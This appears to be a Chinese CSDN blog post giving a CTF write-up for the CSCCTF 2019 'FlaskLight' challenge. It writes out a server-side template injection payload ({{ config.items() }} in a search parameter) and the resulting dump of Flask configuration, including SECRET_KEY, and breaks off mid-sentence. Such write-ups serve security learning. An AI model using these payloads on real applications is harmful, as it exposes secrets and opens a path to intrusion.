[CSCCTF 2019 Qual] FlaskLight

本文详细介绍了CSCCTF 2019 Quals阶段的FlaskLight挑战,通过信息收集发现 SSTI (Server-Side Template Injection) 漏洞。利用该漏洞,作者获取了重要线索,揭示了如何通过模板注入技术读取特定目录下的信息,从而逐步解题。
摘要由CSDN通过智能技术生成

信息收集

index大致就这样,没什么信息
在这里插入图片描述
F12看下,发现了线索:search参数
在这里插入图片描述
试下ssti
在这里插入图片描述
基本就是ssti了

漏洞利用

config 也是 Flask模版中的一个全局对象,它包含了所有应用程序的配置值。
{
   {
    config.items() }}    // 查看配置项目的信息     
输入:http://xxxxx//?search={
   {
   %20config.items()%20}}

爆出一堆信息,这里获得第二个线索,flag在这个目录

You searched for:
[('JSON_AS_ASCII', True), ('USE_X_SENDFILE', False), ('SESSION_COOKIE_SECURE', False), ('SESSION_COOKIE_PATH', None), ('SESSION_COOKIE_DOMAIN', False), ('SESSION_COOKIE_NAME', 'session'), ('MAX_COOKIE_SIZE', 4093), ('SESSION_COOKIE_SAMESITE', None), ('PROPAGATE_EXCEPTIONS', None), ('ENV', 'production'), ('DEBUG', False), ('SECRET_KEY', 'CCC{f4k3_Fl49_:v} CCC{the_flag_is_this_dir}'), ('EXPLAIN_TEMPLATE_LOADING', False), ('MAX_CONTENT_LENGTH', None), ('APPLICATION_ROOT', '/'), ('SERVER_NAME', None), ('PREFERRED_URL_SCHEME', 'http'), ('JSONIFY_PRETTYPRINT_REGULAR', False), ('TESTING', False), ('PERMANENT_SESSION_LIFETIME', datetime.timedelta(31)), ('TEMPLATES_AUTO_RELOAD', None), ('TRAP_BAD_REQUEST_ERRORS', None), ('JSON_SORT_KEYS', True), ('JSONIFY_MIMETYPE', 'application/json'), ('SESSION_COOKIE_HTTPONLY', True), ('SEND_FILE_MAX_AGE_DEFAULT', datetime.timedelta(0, 43200)), ('PRESERVE_CONTEXT_ON_EXCEPTION', None), ('SESSION_REFRESH_EACH_REQUEST', True), ('TRAP_HTTP_EXCEPTIONS', False)]

Here is your result
[]

在这里插入图片描述
看了大佬的wp,得知{ {

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值